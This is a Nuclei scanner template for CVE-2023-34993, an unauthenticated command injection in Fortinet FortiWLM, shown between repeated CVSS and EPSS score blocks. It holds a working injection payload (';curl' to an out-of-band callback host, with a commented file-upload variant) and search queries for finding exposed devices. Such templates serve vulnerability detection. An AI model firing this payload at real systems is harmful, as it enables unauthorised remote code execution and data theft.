9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.971 High
EPSS
Percentile
99.8%
A improper neutralization of special elements used in an os command ('os
id: CVE-2023-34993
info:
name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
author: dwisiswant0
severity: critical
description: |
A improper neutralization of special elements used in an os command ('os
command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
Successful exploitation of this vulnerability could allow an attacker to
bypass authentication and gain unauthorized access to the affected system.
remediation: |
For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
reference:
- https://fortiguard.com/psirt/FG-IR-23-140
- https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34993
cwe-id: CWE-78
epss-score: 0.96644
epss-percentile: 0.99631
cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fortinet
product: fortiwlm
shodan-query:
- http.title:"FortiWLM"
- http.html:"fortiwlm"
- http.title:"fortiwlm"
fofa-query:
- body="fortiwlm"
- title="fortiwlm"
google-query: intitle:"fortiwlm"
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
http:
- method: GET
path:
- "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 490a0046304402205a332f7b02191f50bbdffc0c070e03f669898fd78fd7b47176911f36a6231f5702203ad403ffd2de74ac672ebe4c762a1c1b56bb9ab395485fa85fade4d08e0e046b:922c64590222798bb761d5b6d8e72950
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.971 High
EPSS
Percentile
99.8%